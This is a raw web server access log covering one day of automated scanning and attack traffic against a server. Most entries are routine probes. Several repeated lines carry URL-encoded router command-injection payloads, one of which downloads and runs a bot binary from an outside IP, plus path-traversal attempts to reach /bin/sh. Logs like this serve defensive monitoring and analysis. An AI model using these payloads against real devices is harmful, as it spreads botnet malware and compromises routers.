87.121.69.27 - - [23/Jun/2024:00:15:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [23/Jun/2024:00:45:33 +0200] "GET / HTTP/1.1" 200 1895 46.246.106.42 - - [23/Jun/2024:01:01:35 +0200] "GET /status HTTP/1.1" 404 724 46.246.106.42 - - [23/Jun/2024:01:01:35 +0200] "GET /stat HTTP/1.1" 404 722 80.66.83.187 - - [23/Jun/2024:01:11:38 +0200] "-" 400 1930 87.121.69.27 - - [23/Jun/2024:01:32:38 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 4.255.100.242 - - [23/Jun/2024:01:33:15 +0200] "GET / HTTP/1.1" 200 1895 121.150.255.1 - - [23/Jun/2024:01:49:26 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 149.50.103.48 - - [23/Jun/2024:02:16:17 +0200] "GET / HTTP/1.1" 200 1895 178.212.51.161 - - [23/Jun/2024:03:01:15 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.108 - - [23/Jun/2024:03:01:35 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.108 - - [23/Jun/2024:03:01:39 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.108 - - [23/Jun/2024:03:01:39 +0200] "GET /favicon.ico HTTP/1.1" 404 729 141.98.11.15 - - [23/Jun/2024:03:19:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 157.245.252.5 - - [23/Jun/2024:03:20:17 +0200] "-" 400 1930 87.121.69.27 - - [23/Jun/2024:03:38:25 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 216.218.206.84 - - [23/Jun/2024:03:46:20 +0200] "-" 400 1930 141.98.11.82 - - [23/Jun/2024:03:50:20 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 804 141.98.11.82 - - [23/Jun/2024:03:50:20 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 816 149.50.103.48 - - [23/Jun/2024:03:50:42 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [23/Jun/2024:04:01:46 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [23/Jun/2024:04:01:46 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 94.156.66.83 - - [23/Jun/2024:04:57:43 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 78.108.177.50 - - [23/Jun/2024:05:38:26 +0200] "GET / HTTP/1.0" 200 1895 41.215.69.106 - - [23/Jun/2024:05:45:26 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [23/Jun/2024:06:07:48 +0200] "GET / HTTP/1.1" 200 1895 185.191.126.213 - - [23/Jun/2024:06:47:31 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.200 - - [23/Jun/2024:06:58:01 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 123.136.29.130 - - [23/Jun/2024:07:03:25 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.200 - - [23/Jun/2024:07:08:34 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 149.50.103.48 - - [23/Jun/2024:07:16:05 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.98 - - [23/Jun/2024:07:26:04 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.98 - - [23/Jun/2024:07:26:07 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.98 - - [23/Jun/2024:07:26:07 +0200] "GET /favicon.ico HTTP/1.1" 404 729 162.142.125.223 - - [23/Jun/2024:07:39:19 +0200] "GET / HTTP/1.1" 200 1895 162.142.125.223 - - [23/Jun/2024:07:39:23 +0200] "GET / HTTP/1.1" 200 1895 162.142.125.223 - - [23/Jun/2024:07:39:23 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.148.10.174 - - [23/Jun/2024:07:51:54 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [23/Jun/2024:07:51:54 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 141.98.83.197 - - [23/Jun/2024:08:00:34 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [23/Jun/2024:08:00:34 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 219.79.197.160 - - [23/Jun/2024:08:05:37 +0200] "-" 400 1930 219.79.197.160 - - [23/Jun/2024:08:05:37 +0200] "-" 400 1930 219.79.197.160 - - [23/Jun/2024:08:05:38 +0200] "CONNECT api64.ipify.org:80 HTTP/1.1" 400 804 91.92.249.23 - - [23/Jun/2024:08:13:42 +0200] "HEAD / HTTP/1.0" 200 - 91.92.249.23 - - [23/Jun/2024:08:13:42 +0200] "GET /.git/config HTTP/1.1" 404 733 207.154.217.207 - - [23/Jun/2024:08:51:02 +0200] "GET / HTTP/1.0" 200 1895 164.92.194.127 - - [23/Jun/2024:08:51:03 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 752 134.122.85.106 - - [23/Jun/2024:08:51:03 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 64.226.105.185 - - [23/Jun/2024:08:51:03 +0200] "-" 400 1930 164.92.194.127 - - [23/Jun/2024:08:51:03 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742 46.101.206.83 - - [23/Jun/2024:08:53:56 +0200] "GET / HTTP/1.1" 200 1895 46.101.198.42 - - [23/Jun/2024:08:57:04 +0200] "GET /v2/_catalog HTTP/1.1" 404 733 87.121.69.27 - - [23/Jun/2024:09:01:15 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [23/Jun/2024:09:22:14 +0200] "GET / HTTP/1.1" 200 1895 46.246.106.42 - - [23/Jun/2024:09:35:51 +0200] "GET /c/xpcom.common.js HTTP/1.1" 404 739 46.246.106.42 - - [23/Jun/2024:09:35:51 +0200] "GET /c/bs.common.js HTTP/1.1" 404 736 46.246.106.42 - - [23/Jun/2024:09:35:52 +0200] "GET /xpcom.common.js HTTP/1.1" 404 733 46.246.106.42 - - [23/Jun/2024:09:35:52 +0200] "GET /stalker_portal/c/xpcom.common.js HTTP/1.1" 404 758 194.59.31.99 - - [23/Jun/2024:10:53:16 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 45.128.232.200 - - [23/Jun/2024:10:55:33 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 64.62.197.96 - - [23/Jun/2024:11:02:09 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.99 - - [23/Jun/2024:11:02:31 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.92 - - [23/Jun/2024:11:02:42 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.197.105 - - [23/Jun/2024:11:02:48 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 205.210.31.184 - - [23/Jun/2024:11:03:16 +0200] "GET / HTTP/1.1" 200 1895 172.245.131.82 - - [23/Jun/2024:11:06:27 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [23/Jun/2024:11:13:04 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [23/Jun/2024:11:32:47 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 110.42.5.178 - - [23/Jun/2024:11:35:12 +0200] "GET /manager/html HTTP/1.1" 401 2499 141.98.83.197 - - [23/Jun/2024:11:43:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [23/Jun/2024:11:43:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 80.76.49.133 - - [23/Jun/2024:11:48:33 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 141.98.11.15 - - [23/Jun/2024:11:55:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [23/Jun/2024:12:23:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.71.247 - - [23/Jun/2024:12:31:44 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 188.166.87.67 - - [23/Jun/2024:12:31:54 +0200] "GET / HTTP/1.1" 200 1895 188.166.87.67 - - [23/Jun/2024:12:31:55 +0200] "-" 400 1930 134.122.22.7 - - [23/Jun/2024:12:43:23 +0200] "-" 400 1930 134.122.22.7 - - [23/Jun/2024:12:43:23 +0200] "-" 400 1930 134.122.22.7 - - [23/Jun/2024:12:43:24 +0200] "GET / HTTP/1.1" 200 1895 134.122.22.7 - - [23/Jun/2024:12:43:24 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 149.50.103.48 - - [23/Jun/2024:12:45:18 +0200] "GET / HTTP/1.1" 200 1895 223.109.64.161 - - [23/Jun/2024:13:08:28 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 740 223.109.64.161 - - [23/Jun/2024:13:08:28 +0200] "-" 400 1930 199.45.154.147 - - [23/Jun/2024:13:19:26 +0200] "GET / HTTP/1.1" 200 1895 199.45.154.147 - - [23/Jun/2024:13:19:29 +0200] "GET / HTTP/1.1" 200 1895 199.45.154.147 - - [23/Jun/2024:13:19:31 +0200] "GET /favicon.ico HTTP/1.1" 404 729 149.50.103.48 - - [23/Jun/2024:13:26:58 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [23/Jun/2024:14:25:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [23/Jun/2024:14:25:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 79.61.250.112 - - [23/Jun/2024:14:31:41 +0200] "GET / HTTP/1.0" 200 1895 141.98.83.197 - - [23/Jun/2024:15:00:46 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [23/Jun/2024:15:00:46 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 167.94.138.121 - - [23/Jun/2024:15:02:45 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.121 - - [23/Jun/2024:15:02:48 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.121 - - [23/Jun/2024:15:02:49 +0200] "GET /favicon.ico HTTP/1.1" 404 729 39.36.81.120 - - [23/Jun/2024:15:17:37 +0200] "GET / HTTP/1.1" 200 1895 101.36.123.67 - - [23/Jun/2024:15:32:34 +0200] "GET / HTTP/1.1" 200 1895 101.36.123.67 - - [23/Jun/2024:15:32:35 +0200] "GET /favicon.ico HTTP/1.1" 404 729 101.36.123.67 - - [23/Jun/2024:15:32:35 +0200] "GET /robots.txt HTTP/1.1" 404 728 101.36.123.67 - - [23/Jun/2024:15:32:35 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 101.36.123.67 - - [23/Jun/2024:15:32:36 +0200] "GET /axis2-admin/ HTTP/1.1" 404 734 101.36.123.67 - - [23/Jun/2024:15:32:37 +0200] "GET /axis2/ HTTP/1.1" 404 728 101.36.123.67 - - [23/Jun/2024:15:32:37 +0200] "GET /axis2/axis2-admin/ HTTP/1.1" 404 744 101.36.123.67 - - [23/Jun/2024:15:32:38 +0200] "GET null HTTP/1.1" 400 1994 101.36.123.67 - - [23/Jun/2024:15:32:39 +0200] "GET /struts/webconsole.html HTTP/1.1" 404 744 101.36.123.67 - - [23/Jun/2024:15:32:39 +0200] "GET /?actionErrors=1111 HTTP/1.1" 200 1895 101.36.123.67 - - [23/Jun/2024:15:32:40 +0200] "GET /invoker/readonly HTTP/1.1" 404 738 84.54.51.156 - - [23/Jun/2024:15:50:11 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [23/Jun/2024:15:50:30 +0200] "GET / HTTP/1.1" 200 1895 91.219.214.131 - - [23/Jun/2024:16:35:42 +0200] "GET / HTTP/1.1" 200 1895 91.219.214.131 - - [23/Jun/2024:16:35:43 +0200] "GET /HNAP1/ HTTP/1.1" 404 728 194.59.31.99 - - [23/Jun/2024:16:46:17 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 141.98.83.197 - - [23/Jun/2024:16:56:39 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [23/Jun/2024:16:56:39 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 149.50.103.48 - - [23/Jun/2024:16:57:10 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [23/Jun/2024:17:05:02 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 91.238.104.236 - - [23/Jun/2024:17:08:27 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.191.126.213 - - [23/Jun/2024:17:08:38 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [23/Jun/2024:17:14:14 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [23/Jun/2024:17:14:18 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [23/Jun/2024:17:14:18 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.148.10.174 - - [23/Jun/2024:17:25:10 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [23/Jun/2024:17:25:10 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 94.156.64.121 - - [23/Jun/2024:17:40:42 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 94.156.71.232 - - [23/Jun/2024:17:59:42 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 87.121.69.27 - - [23/Jun/2024:17:59:55 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [23/Jun/2024:18:18:42 +0200] "GET / HTTP/1.1" 200 1895 106.75.11.194 - - [23/Jun/2024:19:05:10 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [23/Jun/2024:19:11:29 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 164.92.247.38 - - [23/Jun/2024:19:16:31 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723 149.50.103.48 - - [23/Jun/2024:19:55:46 +0200] "GET / HTTP/1.1" 200 1895 164.92.247.38 - - [23/Jun/2024:19:58:34 +0200] "-" 400 1930 164.92.247.38 - - [23/Jun/2024:19:58:34 +0200] "-" 400 1930 164.92.247.38 - - [23/Jun/2024:19:58:34 +0200] "-" 400 1930 141.98.83.197 - - [23/Jun/2024:20:02:18 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [23/Jun/2024:20:02:18 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.128.232.200 - - [23/Jun/2024:20:06:13 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 104.168.70.165 - - [23/Jun/2024:20:09:04 +0200] "GET / HTTP/1.1" 200 1895 80.75.212.75 - - [23/Jun/2024:20:24:50 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 78.108.177.54 - - [23/Jun/2024:20:48:49 +0200] "GET / HTTP/1.0" 200 1895 164.90.170.123 - - [23/Jun/2024:21:11:45 +0200] "-" 400 1930 164.90.170.123 - - [23/Jun/2024:21:12:48 +0200] "GET /hello HTTP/1.1" 404 723 205.210.31.60 - - [23/Jun/2024:22:06:11 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [23/Jun/2024:22:07:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [23/Jun/2024:22:17:50 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [23/Jun/2024:22:40:20 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [23/Jun/2024:23:23:17 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [23/Jun/2024:23:34:00 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [23/Jun/2024:23:34:00 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756